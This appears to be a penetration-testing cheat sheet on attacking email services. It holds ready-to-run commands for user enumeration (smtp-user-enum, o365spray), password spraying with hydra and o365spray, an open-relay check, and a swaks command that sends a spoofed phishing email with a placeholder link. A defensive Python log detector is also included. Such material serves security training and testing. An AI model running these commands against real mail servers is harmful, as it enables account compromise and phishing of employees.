βœ‰οΈEmail

Enumeration

Email enumeration is harder than enumerating a single host, because mail may be spread across multiple servers and ports, and many companies host their email services in the cloud.

The most common ports are as follows:

  • 25 - SMTP

  • 143 - IMAP4

  • 110 - POP3

  • 465 - SMTP Encrypted

  • 587 - SMTP Encrypted/STARTTLS

  • 993 - IMAP4 Encrypted

  • 995 - POP3 Encrypted

Basic scan

sudo nmap -Pn -sVC -p25,143,110,465,587,993,995 IP

The MX record specifies the mail server responsible for accepting all email messages on behalf of the domain.

We can use the Mail eXchanger (MX) DNS record to identify a mail server.

Host MX Records

host -t MX domain

Host A Records

host -t A mail.domain

DIG MX

dig mx domain | grep "MX" | grep -v ";"

Misconfiguration

If the service is misconfigured, it may allow anonymous authentication or support methods that enumerate valid users.

Authentication

Simple Mail Transport Protocol (SMTP)

Using commands like VRFY, EXPN and RCPT TO we can try to enumerate usernames. Once a valid username is found we can password spray, guess or attempt to brute force the password.

  • VRFY - asks the server to verify an email address

  • EXPN - asks the server for the membership of a mailing list

  • RCPT TO - identifies the recipient of the email message

IMAP/POP3

We can enumerate users with the USER command followed by a username; if the server responds with OK, the user exists on the server.

User Enumeration

To automate the enumeration process we can use the smtp-user-enum tool.

# usage: smtp-user-enum -M <VRFY|EXPN|RCPT> -U users.txt -D domain -t IP
smtp-user-enum -M RCPT -U users.txt -D domain -t IP
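From the defender's side, the VRFY/EXPN and RCPT TO probing described above is noisy in mail server logs. The following is an added example, not part of this page or of smtp-user-enum: a Python script that scans constructed, simplified smtpd-style log lines (the format and addresses are made up for the example) and flags clients that issue VRFY/EXPN or probe many unknown recipients.

```python
import re
from collections import defaultdict

# Constructed, simplified smtpd-style log lines (not real server output).
SAMPLE_LOG = """\
10:15:01 mx1 smtpd[1234]: client=203.0.113.5 cmd=VRFY arg=<alice@example.com> code=252
10:15:02 mx1 smtpd[1234]: client=203.0.113.5 cmd=RCPT arg=<bob@example.com> code=550 msg="User unknown"
10:15:02 mx1 smtpd[1234]: client=203.0.113.5 cmd=RCPT arg=<carol@example.com> code=550 msg="User unknown"
10:15:03 mx1 smtpd[1234]: client=203.0.113.5 cmd=RCPT arg=<dave@example.com> code=550 msg="User unknown"
10:15:03 mx1 smtpd[1234]: client=203.0.113.5 cmd=RCPT arg=<erin@example.com> code=250 msg="Ok"
10:15:04 mx1 smtpd[1234]: client=203.0.113.5 cmd=RCPT arg=<frank@example.com> code=550 msg="User unknown"
10:16:10 mx1 smtpd[1301]: client=198.51.100.7 cmd=RCPT arg=<sales@example.com> code=250 msg="Ok"
10:16:11 mx1 smtpd[1301]: client=198.51.100.7 cmd=RCPT arg=<salse@example.com> code=550 msg="User unknown"
"""

LINE_RE = re.compile(
    r"client=(?P<ip>[\d.]+) cmd=(?P<cmd>\w+) arg=<(?P<arg>[^>]*)> code=(?P<code>\d{3})"
)

def detect_user_enumeration(log_text, unknown_threshold=3):
    """Return {ip: reasons} for clients that look like they are enumerating users.

    Two signals: any use of VRFY/EXPN (rarely legitimate), and a burst of
    distinct recipients rejected as unknown (RCPT TO probing)."""
    unknown = defaultdict(set)      # ip -> recipients rejected with 550
    verify_cmds = defaultdict(int)  # ip -> number of VRFY/EXPN commands
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        ip, cmd, arg, code = m["ip"], m["cmd"].upper(), m["arg"], m["code"]
        if cmd in ("VRFY", "EXPN"):
            verify_cmds[ip] += 1
        elif cmd == "RCPT" and code == "550":
            unknown[ip].add(arg)
    findings = {}
    for ip in set(unknown) | set(verify_cmds):
        reasons = []
        if verify_cmds[ip]:
            reasons.append(f"{verify_cmds[ip]} VRFY/EXPN command(s)")
        if len(unknown[ip]) >= unknown_threshold:
            reasons.append(f"{len(unknown[ip])} distinct unknown recipients")
        if reasons:
            findings[ip] = reasons
    return findings

if __name__ == "__main__":
    for ip, reasons in detect_user_enumeration(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

A single typo'd recipient from 198.51.100.7 stays below the threshold, while 203.0.113.5 is flagged on both signals.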

Cloud Enumeration

O365 Spray

A username and password enumeration tool that is aimed at Microsoft Office 365.

Check if the domain is valid

python3 o365spray.py --validate --domain domain 

Identify Usernames

python3 o365spray.py --enum -U users.txt --domain domain 

Password Attacks

POP3 password spray

hydra -L users.txt -p 'password' -f IP pop3

O365 Spray

python3 o365spray.py --spray -U usersfound.txt -p 'Password1' --count 1 --lockout 1 --domain domain 

Open Relay Attacks

An open relay is a misconfigured SMTP server that accepts and forwards mail from unauthenticated senders. This masks the true source of the message and makes it appear to have originated from the open relay server.

In theory, we could abuse this for phishing emails by spoofing someone else's email address.

Identify if the SMTP port allows an open relay

nmap -p25 -Pn --script smtp-open-relay IP

We can now use a mail client to connect to the mail server and send our email.

swaks --from notifications@domain --to employees@domain --header 'Subject: Company Notification' \
--body 'Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/' \
--server IP
